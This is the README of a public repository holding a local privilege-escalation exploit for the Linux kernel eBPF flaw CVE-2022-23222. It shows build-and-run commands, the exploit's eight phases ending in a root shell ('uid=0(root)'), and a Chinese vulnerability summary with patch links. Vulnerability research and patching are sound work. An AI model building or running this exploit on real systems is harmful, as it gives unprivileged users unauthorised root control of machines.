1faf70023c
|
||
|---|---|---|
| .. | ||
| include | ||
| Makefile | ||
| README.md | ||
| exploit.c | ||
README.md
CVE-2022-23222
Chinese writeup: https://tr3e.ee/posts/cve-2022-23222-linux-kernel-ebpf-lpe.txt
For educational/research purposes only. Use at your own risk.
Build & Run
$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# exit
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done
漏洞编号
CVE-2022-23222
漏洞等级
高危
漏洞简介
Linux kernel 5.15.14及之前版本存在代码问题漏洞,攻击者可利用该漏洞获得特权。
漏洞类型
权限提升
漏洞检测程序来源
补丁链接
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=c25b2ae136039ffa820c26138ed4a5e5f3ab3841
- https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=35ab8c9085b0af847df7fac9571ccd26d9f0f513